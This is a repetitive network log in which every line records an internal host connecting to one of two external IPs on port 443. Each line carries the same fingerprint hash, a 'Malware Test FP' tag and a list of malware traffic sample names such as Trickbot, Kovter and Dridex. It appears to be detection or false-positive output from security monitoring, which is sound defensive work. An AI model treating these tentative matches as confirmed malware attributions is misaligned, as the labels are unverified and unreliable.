10.7.21.101 49358 109.234.37.227 443 6734f37431670b3ab4292b8f60f29984 Malware Test FP: trickbot-infection-from-usdata.estoreseller.com, malspam-infection-traffic, upatre-malspam-infection-traffic, fedex-malspam-sends-kovter, trickbot-infection-from-carriereiter.com.exe, kovter-nemucodaes-malspam-traffic, necurs-botnet-malspam-pushes-trickbot, kovter-nemucod-malspam-traffic, angler-ek-traffic, trickbot-malspam-traffic, trickbot-infection-from-carriereiserphotography.com, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, trickbot-malspam-traffic-example, trickbot-infection-from-carriereiter.com, nuclear-ek-traffic, kovter-locky-malspam-traffic
10.7.21.101 49366 109.234.37.227 443 6734f37431670b3ab4292b8f60f29984 Malware Test FP: trickbot-infection-from-usdata.estoreseller.com, malspam-infection-traffic, upatre-malspam-infection-traffic, fedex-malspam-sends-kovter, trickbot-infection-from-carriereiter.com.exe, kovter-nemucodaes-malspam-traffic, necurs-botnet-malspam-pushes-trickbot, kovter-nemucod-malspam-traffic, angler-ek-traffic, trickbot-malspam-traffic, trickbot-infection-from-carriereiserphotography.com, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, trickbot-malspam-traffic-example, trickbot-infection-from-carriereiter.com, nuclear-ek-traffic, kovter-locky-malspam-traffic
10.7.21.101 49367 109.234.37.227 443 6734f37431670b3ab4292b8f60f29984 Malware Test FP: trickbot-infection-from-usdata.estoreseller.com, malspam-infection-traffic, upatre-malspam-infection-traffic, fedex-malspam-sends-kovter, trickbot-infection-from-carriereiter.com.exe, kovter-nemucodaes-malspam-traffic, necurs-botnet-malspam-pushes-trickbot, kovter-nemucod-malspam-traffic, angler-ek-traffic, trickbot-malspam-traffic, trickbot-infection-from-carriereiserphotography.com, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, trickbot-malspam-traffic-example, trickbot-infection-from-carriereiter.com, nuclear-ek-traffic, kovter-locky-malspam-traffic
10.7.21.101 49375 109.234.37.227 443 6734f37431670b3ab4292b8f60f29984 Malware Test FP: trickbot-infection-from-usdata.estoreseller.com, malspam-infection-traffic, upatre-malspam-infection-traffic, fedex-malspam-sends-kovter, trickbot-infection-from-carriereiter.com.exe, kovter-nemucodaes-malspam-traffic, necurs-botnet-malspam-pushes-trickbot, kovter-nemucod-malspam-traffic, angler-ek-traffic, trickbot-malspam-traffic, trickbot-infection-from-carriereiserphotography.com, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, trickbot-malspam-traffic-example, trickbot-infection-from-carriereiter.com, nuclear-ek-traffic, kovter-locky-malspam-traffic
10.7.21.101 49376 109.234.37.227 443 6734f37431670b3ab4292b8f60f29984 Malware Test FP: trickbot-infection-from-usdata.estoreseller.com, malspam-infection-traffic, upatre-malspam-infection-traffic, fedex-malspam-sends-kovter, trickbot-infection-from-carriereiter.com.exe, kovter-nemucodaes-malspam-traffic, necurs-botnet-malspam-pushes-trickbot, kovter-nemucod-malspam-traffic, angler-ek-traffic, trickbot-malspam-traffic, trickbot-infection-from-carriereiserphotography.com, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, trickbot-malspam-traffic-example, trickbot-infection-from-carriereiter.com, nuclear-ek-traffic, kovter-locky-malspam-traffic
10.7.21.101 49377 109.234.37.227 443 6734f37431670b3ab4292b8f60f29984 Malware Test FP: trickbot-infection-from-usdata.estoreseller.com, malspam-infection-traffic, upatre-malspam-infection-traffic, fedex-malspam-sends-kovter, trickbot-infection-from-carriereiter.com.exe, kovter-nemucodaes-malspam-traffic, necurs-botnet-malspam-pushes-trickbot, kovter-nemucod-malspam-traffic, angler-ek-traffic, trickbot-malspam-traffic, trickbot-infection-from-carriereiserphotography.com, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, trickbot-malspam-traffic-example, trickbot-infection-from-carriereiter.com, nuclear-ek-traffic, kovter-locky-malspam-traffic
10.7.21.101 49378 109.234.37.227 443 6734f37431670b3ab4292b8f60f29984 Malware Test FP: trickbot-infection-from-usdata.estoreseller.com, malspam-infection-traffic, upatre-malspam-infection-traffic, fedex-malspam-sends-kovter, trickbot-infection-from-carriereiter.com.exe, kovter-nemucodaes-malspam-traffic, necurs-botnet-malspam-pushes-trickbot, kovter-nemucod-malspam-traffic, angler-ek-traffic, trickbot-malspam-traffic, trickbot-infection-from-carriereiserphotography.com, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, trickbot-malspam-traffic-example, trickbot-infection-from-carriereiter.com, nuclear-ek-traffic, kovter-locky-malspam-traffic
10.7.21.101 49380 109.234.37.227 443 6734f37431670b3ab4292b8f60f29984 Malware Test FP: trickbot-infection-from-usdata.estoreseller.com, malspam-infection-traffic, upatre-malspam-infection-traffic, fedex-malspam-sends-kovter, trickbot-infection-from-carriereiter.com.exe, kovter-nemucodaes-malspam-traffic, necurs-botnet-malspam-pushes-trickbot, kovter-nemucod-malspam-traffic, angler-ek-traffic, trickbot-malspam-traffic, trickbot-infection-from-carriereiserphotography.com, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, trickbot-malspam-traffic-example, trickbot-infection-from-carriereiter.com, nuclear-ek-traffic, kovter-locky-malspam-traffic
10.7.21.101 49381 109.234.37.227 443 6734f37431670b3ab4292b8f60f29984 Malware Test FP: trickbot-infection-from-usdata.estoreseller.com, malspam-infection-traffic, upatre-malspam-infection-traffic, fedex-malspam-sends-kovter, trickbot-infection-from-carriereiter.com.exe, kovter-nemucodaes-malspam-traffic, necurs-botnet-malspam-pushes-trickbot, kovter-nemucod-malspam-traffic, angler-ek-traffic, trickbot-malspam-traffic, trickbot-infection-from-carriereiserphotography.com, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, trickbot-malspam-traffic-example, trickbot-infection-from-carriereiter.com, nuclear-ek-traffic, kovter-locky-malspam-traffic
10.7.21.101 49382 109.234.37.227 443 6734f37431670b3ab4292b8f60f29984 Malware Test FP: trickbot-infection-from-usdata.estoreseller.com, malspam-infection-traffic, upatre-malspam-infection-traffic, fedex-malspam-sends-kovter, trickbot-infection-from-carriereiter.com.exe, kovter-nemucodaes-malspam-traffic, necurs-botnet-malspam-pushes-trickbot, kovter-nemucod-malspam-traffic, angler-ek-traffic, trickbot-malspam-traffic, trickbot-infection-from-carriereiserphotography.com, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, trickbot-malspam-traffic-example, trickbot-infection-from-carriereiter.com, nuclear-ek-traffic, kovter-locky-malspam-traffic
10.7.21.101 49383 109.234.37.227 443 6734f37431670b3ab4292b8f60f29984 Malware Test FP: trickbot-infection-from-usdata.estoreseller.com, malspam-infection-traffic, upatre-malspam-infection-traffic, fedex-malspam-sends-kovter, trickbot-infection-from-carriereiter.com.exe, kovter-nemucodaes-malspam-traffic, necurs-botnet-malspam-pushes-trickbot, kovter-nemucod-malspam-traffic, angler-ek-traffic, trickbot-malspam-traffic, trickbot-infection-from-carriereiserphotography.com, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, trickbot-malspam-traffic-example, trickbot-infection-from-carriereiter.com, nuclear-ek-traffic, kovter-locky-malspam-traffic
10.7.21.101 49388 109.86.227.152 443 6734f37431670b3ab4292b8f60f29984 Malware Test FP: trickbot-infection-from-usdata.estoreseller.com, malspam-infection-traffic, upatre-malspam-infection-traffic, fedex-malspam-sends-kovter, trickbot-infection-from-carriereiter.com.exe, kovter-nemucodaes-malspam-traffic, necurs-botnet-malspam-pushes-trickbot, kovter-nemucod-malspam-traffic, angler-ek-traffic, trickbot-malspam-traffic, trickbot-infection-from-carriereiserphotography.com, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, trickbot-malspam-traffic-example, trickbot-infection-from-carriereiter.com, nuclear-ek-traffic, kovter-locky-malspam-traffic
10.7.21.101 49389 109.86.227.152 443 6734f37431670b3ab4292b8f60f29984 Malware Test FP: trickbot-infection-from-usdata.estoreseller.com, malspam-infection-traffic, upatre-malspam-infection-traffic, fedex-malspam-sends-kovter, trickbot-infection-from-carriereiter.com.exe, kovter-nemucodaes-malspam-traffic, necurs-botnet-malspam-pushes-trickbot, kovter-nemucod-malspam-traffic, angler-ek-traffic, trickbot-malspam-traffic, trickbot-infection-from-carriereiserphotography.com, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, trickbot-malspam-traffic-example, trickbot-infection-from-carriereiter.com, nuclear-ek-traffic, kovter-locky-malspam-traffic
10.7.21.101 49390 109.86.227.152 443 6734f37431670b3ab4292b8f60f29984 Malware Test FP: trickbot-infection-from-usdata.estoreseller.com, malspam-infection-traffic, upatre-malspam-infection-traffic, fedex-malspam-sends-kovter, trickbot-infection-from-carriereiter.com.exe, kovter-nemucodaes-malspam-traffic, necurs-botnet-malspam-pushes-trickbot, kovter-nemucod-malspam-traffic, angler-ek-traffic, trickbot-malspam-traffic, trickbot-infection-from-carriereiserphotography.com, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, trickbot-malspam-traffic-example, trickbot-infection-from-carriereiter.com, nuclear-ek-traffic, kovter-locky-malspam-traffic
10.7.21.101 49394 109.86.227.152 443 6734f37431670b3ab4292b8f60f29984 Malware Test FP: trickbot-infection-from-usdata.estoreseller.com, malspam-infection-traffic, upatre-malspam-infection-traffic, fedex-malspam-sends-kovter, trickbot-infection-from-carriereiter.com.exe, kovter-nemucodaes-malspam-traffic, necurs-botnet-malspam-pushes-trickbot, kovter-nemucod-malspam-traffic, angler-ek-traffic, trickbot-malspam-traffic, trickbot-infection-from-carriereiserphotography.com, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, trickbot-malspam-traffic-example, trickbot-infection-from-carriereiter.com, nuclear-ek-traffic, kovter-locky-malspam-traffic
10.7.21.101 49395 109.86.227.152 443 6734f37431670b3ab4292b8f60f29984 Malware Test FP: trickbot-infection-from-usdata.estoreseller.com, malspam-infection-traffic, upatre-malspam-infection-traffic, fedex-malspam-sends-kovter, trickbot-infection-from-carriereiter.com.exe, kovter-nemucodaes-malspam-traffic, necurs-botnet-malspam-pushes-trickbot, kovter-nemucod-malspam-traffic, angler-ek-traffic, trickbot-malspam-traffic, trickbot-infection-from-carriereiserphotography.com, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, trickbot-malspam-traffic-example, trickbot-infection-from-carriereiter.com, nuclear-ek-traffic, kovter-locky-malspam-traffic
10.7.21.101 49396 109.86.227.152 443 6734f37431670b3ab4292b8f60f29984 Malware Test FP: trickbot-infection-from-usdata.estoreseller.com, malspam-infection-traffic, upatre-malspam-infection-traffic, fedex-malspam-sends-kovter, trickbot-infection-from-carriereiter.com.exe, kovter-nemucodaes-malspam-traffic, necurs-botnet-malspam-pushes-trickbot, kovter-nemucod-malspam-traffic, angler-ek-traffic, trickbot-malspam-traffic, trickbot-infection-from-carriereiserphotography.com, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, trickbot-malspam-traffic-example, trickbot-infection-from-carriereiter.com, nuclear-ek-traffic, kovter-locky-malspam-traffic
10.7.21.101 49397 109.86.227.152 443 6734f37431670b3ab4292b8f60f29984 Malware Test FP: trickbot-infection-from-usdata.estoreseller.com, malspam-infection-traffic, upatre-malspam-infection-traffic, fedex-malspam-sends-kovter, trickbot-infection-from-carriereiter.com.exe, kovter-nemucodaes-malspam-traffic, necurs-botnet-malspam-pushes-trickbot, kovter-nemucod-malspam-traffic, angler-ek-traffic, trickbot-malspam-traffic, trickbot-infection-from-carriereiserphotography.com, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, trickbot-malspam-traffic-example, trickbot-infection-from-carriereiter.com, nuclear-ek-traffic, kovter-locky-malspam-traffic
10.7.21.101 49399 109.86.227.152 443 6734f37431670b3ab4292b8f60f29984 Malware Test FP: trickbot-infection-from-usdata.estoreseller.com, malspam-infection-traffic, upatre-malspam-infection-traffic, fedex-malspam-sends-kovter, trickbot-infection-from-carriereiter.com.exe, kovter-nemucodaes-malspam-traffic, necurs-botnet-malspam-pushes-trickbot, kovter-nemucod-malspam-traffic, angler-ek-traffic, trickbot-malspam-traffic, trickbot-infection-from-carriereiserphotography.com, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, trickbot-malspam-traffic-example, trickbot-infection-from-carriereiter.com, nuclear-ek-traffic, kovter-locky-malspam-traffic
10.7.21.101 49400 109.86.227.152 443 6734f37431670b3ab4292b8f60f29984 Malware Test FP: trickbot-infection-from-usdata.estoreseller.com, malspam-infection-traffic, upatre-malspam-infection-traffic, fedex-malspam-sends-kovter, trickbot-infection-from-carriereiter.com.exe, kovter-nemucodaes-malspam-traffic, necurs-botnet-malspam-pushes-trickbot, kovter-nemucod-malspam-traffic, angler-ek-traffic, trickbot-malspam-traffic, trickbot-infection-from-carriereiserphotography.com, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, trickbot-malspam-traffic-example, trickbot-infection-from-carriereiter.com, nuclear-ek-traffic, kovter-locky-malspam-traffic
10.7.21.101 49401 109.86.227.152 443 6734f37431670b3ab4292b8f60f29984 Malware Test FP: trickbot-infection-from-usdata.estoreseller.com, malspam-infection-traffic, upatre-malspam-infection-traffic, fedex-malspam-sends-kovter, trickbot-infection-from-carriereiter.com.exe, kovter-nemucodaes-malspam-traffic, necurs-botnet-malspam-pushes-trickbot, kovter-nemucod-malspam-traffic, angler-ek-traffic, trickbot-malspam-traffic, trickbot-infection-from-carriereiserphotography.com, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, trickbot-malspam-traffic-example, trickbot-infection-from-carriereiter.com, nuclear-ek-traffic, kovter-locky-malspam-traffic
10.7.21.101 49402 109.86.227.152 443 6734f37431670b3ab4292b8f60f29984 Malware Test FP: trickbot-infection-from-usdata.estoreseller.com, malspam-infection-traffic, upatre-malspam-infection-traffic, fedex-malspam-sends-kovter, trickbot-infection-from-carriereiter.com.exe, kovter-nemucodaes-malspam-traffic, necurs-botnet-malspam-pushes-trickbot, kovter-nemucod-malspam-traffic, angler-ek-traffic, trickbot-malspam-traffic, trickbot-infection-from-carriereiserphotography.com, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, trickbot-malspam-traffic-example, trickbot-infection-from-carriereiter.com, nuclear-ek-traffic, kovter-locky-malspam-traffic
10.7.21.101 49404 109.86.227.152 443 6734f37431670b3ab4292b8f60f29984 Malware Test FP: trickbot-infection-from-usdata.estoreseller.com, malspam-infection-traffic, upatre-malspam-infection-traffic, fedex-malspam-sends-kovter, trickbot-infection-from-carriereiter.com.exe, kovter-nemucodaes-malspam-traffic, necurs-botnet-malspam-pushes-trickbot, kovter-nemucod-malspam-traffic, angler-ek-traffic, trickbot-malspam-traffic, trickbot-infection-from-carriereiserphotography.com, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, trickbot-malspam-traffic-example, trickbot-infection-from-carriereiter.com, nuclear-ek-traffic, kovter-locky-malspam-traffic
10.7.21.101 49405 109.86.227.152 443 6734f37431670b3ab4292b8f60f29984 Malware Test FP: trickbot-infection-from-usdata.estoreseller.com, malspam-infection-traffic, upatre-malspam-infection-traffic, fedex-malspam-sends-kovter, trickbot-infection-from-carriereiter.com.exe, kovter-nemucodaes-malspam-traffic, necurs-botnet-malspam-pushes-trickbot, kovter-nemucod-malspam-traffic, angler-ek-traffic, trickbot-malspam-traffic, trickbot-infection-from-carriereiserphotography.com, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, trickbot-malspam-traffic-example, trickbot-infection-from-carriereiter.com, nuclear-ek-traffic, kovter-locky-malspam-traffic
10.7.21.101 49406 109.86.227.152 443 6734f37431670b3ab4292b8f60f29984 Malware Test FP: trickbot-infection-from-usdata.estoreseller.com, malspam-infection-traffic, upatre-malspam-infection-traffic, fedex-malspam-sends-kovter, trickbot-infection-from-carriereiter.com.exe, kovter-nemucodaes-malspam-traffic, necurs-botnet-malspam-pushes-trickbot, kovter-nemucod-malspam-traffic, angler-ek-traffic, trickbot-malspam-traffic, trickbot-infection-from-carriereiserphotography.com, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, trickbot-malspam-traffic-example, trickbot-infection-from-carriereiter.com, nuclear-ek-traffic, kovter-locky-malspam-traffic
10.7.21.101 49407 109.86.227.152 443 6734f37431670b3ab4292b8f60f29984 Malware Test FP: trickbot-infection-from-usdata.estoreseller.com, malspam-infection-traffic, upatre-malspam-infection-traffic, fedex-malspam-sends-kovter, trickbot-infection-from-carriereiter.com.exe, kovter-nemucodaes-malspam-traffic, necurs-botnet-malspam-pushes-trickbot, kovter-nemucod-malspam-traffic, angler-ek-traffic, trickbot-malspam-traffic, trickbot-infection-from-carriereiserphotography.com, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, trickbot-malspam-traffic-example, trickbot-infection-from-carriereiter.com, nuclear-ek-traffic, kovter-locky-malspam-traffic
10.7.21.101 49409 109.86.227.152 443 6734f37431670b3ab4292b8f60f29984 Malware Test FP: trickbot-infection-from-usdata.estoreseller.com, malspam-infection-traffic, upatre-malspam-infection-traffic, fedex-malspam-sends-kovter, trickbot-infection-from-carriereiter.com.exe, kovter-nemucodaes-malspam-traffic, necurs-botnet-malspam-pushes-trickbot, kovter-nemucod-malspam-traffic, angler-ek-traffic, trickbot-malspam-traffic, trickbot-infection-from-carriereiserphotography.com, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, trickbot-malspam-traffic-example, trickbot-infection-from-carriereiter.com, nuclear-ek-traffic, kovter-locky-malspam-traffic
10.7.21.101 49417 109.86.227.152 443 6734f37431670b3ab4292b8f60f29984 Malware Test FP: trickbot-infection-from-usdata.estoreseller.com, malspam-infection-traffic, upatre-malspam-infection-traffic, fedex-malspam-sends-kovter, trickbot-infection-from-carriereiter.com.exe, kovter-nemucodaes-malspam-traffic, necurs-botnet-malspam-pushes-trickbot, kovter-nemucod-malspam-traffic, angler-ek-traffic, trickbot-malspam-traffic, trickbot-infection-from-carriereiserphotography.com, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, trickbot-malspam-traffic-example, trickbot-infection-from-carriereiter.com, nuclear-ek-traffic, kovter-locky-malspam-traffic
10.7.21.101 49418 109.86.227.152 443 6734f37431670b3ab4292b8f60f29984 Malware Test FP: trickbot-infection-from-usdata.estoreseller.com, malspam-infection-traffic, upatre-malspam-infection-traffic, fedex-malspam-sends-kovter, trickbot-infection-from-carriereiter.com.exe, kovter-nemucodaes-malspam-traffic, necurs-botnet-malspam-pushes-trickbot, kovter-nemucod-malspam-traffic, angler-ek-traffic, trickbot-malspam-traffic, trickbot-infection-from-carriereiserphotography.com, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, trickbot-malspam-traffic-example, trickbot-infection-from-carriereiter.com, nuclear-ek-traffic, kovter-locky-malspam-traffic
10.7.21.101 49419 109.86.227.152 443 6734f37431670b3ab4292b8f60f29984 Malware Test FP: trickbot-infection-from-usdata.estoreseller.com, malspam-infection-traffic, upatre-malspam-infection-traffic, fedex-malspam-sends-kovter, trickbot-infection-from-carriereiter.com.exe, kovter-nemucodaes-malspam-traffic, necurs-botnet-malspam-pushes-trickbot, kovter-nemucod-malspam-traffic, angler-ek-traffic, trickbot-malspam-traffic, trickbot-infection-from-carriereiserphotography.com, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, trickbot-malspam-traffic-example, trickbot-infection-from-carriereiter.com, nuclear-ek-traffic, kovter-locky-malspam-traffic
10.7.21.101 49422 109.86.227.152 443 6734f37431670b3ab4292b8f60f29984 Malware Test FP: trickbot-infection-from-usdata.estoreseller.com, malspam-infection-traffic, upatre-malspam-infection-traffic, fedex-malspam-sends-kovter, trickbot-infection-from-carriereiter.com.exe, kovter-nemucodaes-malspam-traffic, necurs-botnet-malspam-pushes-trickbot, kovter-nemucod-malspam-traffic, angler-ek-traffic, trickbot-malspam-traffic, trickbot-infection-from-carriereiserphotography.com, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, trickbot-malspam-traffic-example, trickbot-infection-from-carriereiter.com, nuclear-ek-traffic, kovter-locky-malspam-traffic
10.7.21.101 49423 109.86.227.152 443 6734f37431670b3ab4292b8f60f29984 Malware Test FP: trickbot-infection-from-usdata.estoreseller.com, malspam-infection-traffic, upatre-malspam-infection-traffic, fedex-malspam-sends-kovter, trickbot-infection-from-carriereiter.com.exe, kovter-nemucodaes-malspam-traffic, necurs-botnet-malspam-pushes-trickbot, kovter-nemucod-malspam-traffic, angler-ek-traffic, trickbot-malspam-traffic, trickbot-infection-from-carriereiserphotography.com, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, trickbot-malspam-traffic-example, trickbot-infection-from-carriereiter.com, nuclear-ek-traffic, kovter-locky-malspam-traffic
10.7.21.101 49424 109.86.227.152 443 6734f37431670b3ab4292b8f60f29984 Malware Test FP: trickbot-infection-from-usdata.estoreseller.com, malspam-infection-traffic, upatre-malspam-infection-traffic, fedex-malspam-sends-kovter, trickbot-infection-from-carriereiter.com.exe, kovter-nemucodaes-malspam-traffic, necurs-botnet-malspam-pushes-trickbot, kovter-nemucod-malspam-traffic, angler-ek-traffic, trickbot-malspam-traffic, trickbot-infection-from-carriereiserphotography.com, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, trickbot-malspam-traffic-example, trickbot-infection-from-carriereiter.com, nuclear-ek-traffic, kovter-locky-malspam-traffic
10.7.21.101 49431 109.86.227.152 443 6734f37431670b3ab4292b8f60f29984 Malware Test FP: trickbot-infection-from-usdata.estoreseller.com, malspam-infection-traffic, upatre-malspam-infection-traffic, fedex-malspam-sends-kovter, trickbot-infection-from-carriereiter.com.exe, kovter-nemucodaes-malspam-traffic, necurs-botnet-malspam-pushes-trickbot, kovter-nemucod-malspam-traffic, angler-ek-traffic, trickbot-malspam-traffic, trickbot-infection-from-carriereiserphotography.com, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, trickbot-malspam-traffic-example, trickbot-infection-from-carriereiter.com, nuclear-ek-traffic, kovter-locky-malspam-traffic
10.7.21.101 49433 109.86.227.152 443 6734f37431670b3ab4292b8f60f29984 Malware Test FP: trickbot-infection-from-usdata.estoreseller.com, malspam-infection-traffic, upatre-malspam-infection-traffic, fedex-malspam-sends-kovter, trickbot-infection-from-carriereiter.com.exe, kovter-nemucodaes-malspam-traffic, necurs-botnet-malspam-pushes-trickbot, kovter-nemucod-malspam-traffic, angler-ek-traffic, trickbot-malspam-traffic, trickbot-infection-from-carriereiserphotography.com, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, trickbot-malspam-traffic-example, trickbot-infection-from-carriereiter.com, nuclear-ek-traffic, kovter-locky-malspam-traffic
10.7.21.101 49434 109.86.227.152 443 6734f37431670b3ab4292b8f60f29984 Malware Test FP: trickbot-infection-from-usdata.estoreseller.com, malspam-infection-traffic, upatre-malspam-infection-traffic, fedex-malspam-sends-kovter, trickbot-infection-from-carriereiter.com.exe, kovter-nemucodaes-malspam-traffic, necurs-botnet-malspam-pushes-trickbot, kovter-nemucod-malspam-traffic, angler-ek-traffic, trickbot-malspam-traffic, trickbot-infection-from-carriereiserphotography.com, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, trickbot-malspam-traffic-example, trickbot-infection-from-carriereiter.com, nuclear-ek-traffic, kovter-locky-malspam-traffic
10.7.21.101 49435 109.86.227.152 443 6734f37431670b3ab4292b8f60f29984 Malware Test FP: trickbot-infection-from-usdata.estoreseller.com, malspam-infection-traffic, upatre-malspam-infection-traffic, fedex-malspam-sends-kovter, trickbot-infection-from-carriereiter.com.exe, kovter-nemucodaes-malspam-traffic, necurs-botnet-malspam-pushes-trickbot, kovter-nemucod-malspam-traffic, angler-ek-traffic, trickbot-malspam-traffic, trickbot-infection-from-carriereiserphotography.com, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, trickbot-malspam-traffic-example, trickbot-infection-from-carriereiter.com, nuclear-ek-traffic, kovter-locky-malspam-traffic
10.7.21.101 49436 109.86.227.152 443 6734f37431670b3ab4292b8f60f29984 Malware Test FP: trickbot-infection-from-usdata.estoreseller.com, malspam-infection-traffic, upatre-malspam-infection-traffic, fedex-malspam-sends-kovter, trickbot-infection-from-carriereiter.com.exe, kovter-nemucodaes-malspam-traffic, necurs-botnet-malspam-pushes-trickbot, kovter-nemucod-malspam-traffic, angler-ek-traffic, trickbot-malspam-traffic, trickbot-infection-from-carriereiserphotography.com, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, trickbot-malspam-traffic-example, trickbot-infection-from-carriereiter.com, nuclear-ek-traffic, kovter-locky-malspam-traffic
10.7.21.101 49438 109.86.227.152 443 6734f37431670b3ab4292b8f60f29984 Malware Test FP: trickbot-infection-from-usdata.estoreseller.com, malspam-infection-traffic, upatre-malspam-infection-traffic, fedex-malspam-sends-kovter, trickbot-infection-from-carriereiter.com.exe, kovter-nemucodaes-malspam-traffic, necurs-botnet-malspam-pushes-trickbot, kovter-nemucod-malspam-traffic, angler-ek-traffic, trickbot-malspam-traffic, trickbot-infection-from-carriereiserphotography.com, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, trickbot-malspam-traffic-example, trickbot-infection-from-carriereiter.com, nuclear-ek-traffic, kovter-locky-malspam-traffic
10.7.21.101 49440 109.86.227.152 443 6734f37431670b3ab4292b8f60f29984 Malware Test FP: trickbot-infection-from-usdata.estoreseller.com, malspam-infection-traffic, upatre-malspam-infection-traffic, fedex-malspam-sends-kovter, trickbot-infection-from-carriereiter.com.exe, kovter-nemucodaes-malspam-traffic, necurs-botnet-malspam-pushes-trickbot, kovter-nemucod-malspam-traffic, angler-ek-traffic, trickbot-malspam-traffic, trickbot-infection-from-carriereiserphotography.com, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, trickbot-malspam-traffic-example, trickbot-infection-from-carriereiter.com, nuclear-ek-traffic, kovter-locky-malspam-traffic
10.7.21.101 49441 109.86.227.152 443 6734f37431670b3ab4292b8f60f29984 Malware Test FP: trickbot-infection-from-usdata.estoreseller.com, malspam-infection-traffic, upatre-malspam-infection-traffic, fedex-malspam-sends-kovter, trickbot-infection-from-carriereiter.com.exe, kovter-nemucodaes-malspam-traffic, necurs-botnet-malspam-pushes-trickbot, kovter-nemucod-malspam-traffic, angler-ek-traffic, trickbot-malspam-traffic, trickbot-infection-from-carriereiserphotography.com, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, trickbot-malspam-traffic-example, trickbot-infection-from-carriereiter.com, nuclear-ek-traffic, kovter-locky-malspam-traffic
10.7.21.101 49442 109.86.227.152 443 6734f37431670b3ab4292b8f60f29984 Malware Test FP: trickbot-infection-from-usdata.estoreseller.com, malspam-infection-traffic, upatre-malspam-infection-traffic, fedex-malspam-sends-kovter, trickbot-infection-from-carriereiter.com.exe, kovter-nemucodaes-malspam-traffic, necurs-botnet-malspam-pushes-trickbot, kovter-nemucod-malspam-traffic, angler-ek-traffic, trickbot-malspam-traffic, trickbot-infection-from-carriereiserphotography.com, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, trickbot-malspam-traffic-example, trickbot-infection-from-carriereiter.com, nuclear-ek-traffic, kovter-locky-malspam-traffic
10.7.21.101 49444 109.86.227.152 443 6734f37431670b3ab4292b8f60f29984 Malware Test FP: trickbot-infection-from-usdata.estoreseller.com, malspam-infection-traffic, upatre-malspam-infection-traffic, fedex-malspam-sends-kovter, trickbot-infection-from-carriereiter.com.exe, kovter-nemucodaes-malspam-traffic, necurs-botnet-malspam-pushes-trickbot, kovter-nemucod-malspam-traffic, angler-ek-traffic, trickbot-malspam-traffic, trickbot-infection-from-carriereiserphotography.com, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, trickbot-malspam-traffic-example, trickbot-infection-from-carriereiter.com, nuclear-ek-traffic, kovter-locky-malspam-traffic
10.7.21.101 49445 109.86.227.152 443 6734f37431670b3ab4292b8f60f29984 Malware Test FP: trickbot-infection-from-usdata.estoreseller.com, malspam-infection-traffic, upatre-malspam-infection-traffic, fedex-malspam-sends-kovter, trickbot-infection-from-carriereiter.com.exe, kovter-nemucodaes-malspam-traffic, necurs-botnet-malspam-pushes-trickbot, kovter-nemucod-malspam-traffic, angler-ek-traffic, trickbot-malspam-traffic, trickbot-infection-from-carriereiserphotography.com, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, trickbot-malspam-traffic-example, trickbot-infection-from-carriereiter.com, nuclear-ek-traffic, kovter-locky-malspam-traffic
10.7.21.101 49446 109.86.227.152 443 6734f37431670b3ab4292b8f60f29984 Malware Test FP: trickbot-infection-from-usdata.estoreseller.com, malspam-infection-traffic, upatre-malspam-infection-traffic, fedex-malspam-sends-kovter, trickbot-infection-from-carriereiter.com.exe, kovter-nemucodaes-malspam-traffic, necurs-botnet-malspam-pushes-trickbot, kovter-nemucod-malspam-traffic, angler-ek-traffic, trickbot-malspam-traffic, trickbot-infection-from-carriereiserphotography.com, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, trickbot-malspam-traffic-example, trickbot-infection-from-carriereiter.com, nuclear-ek-traffic, kovter-locky-malspam-traffic
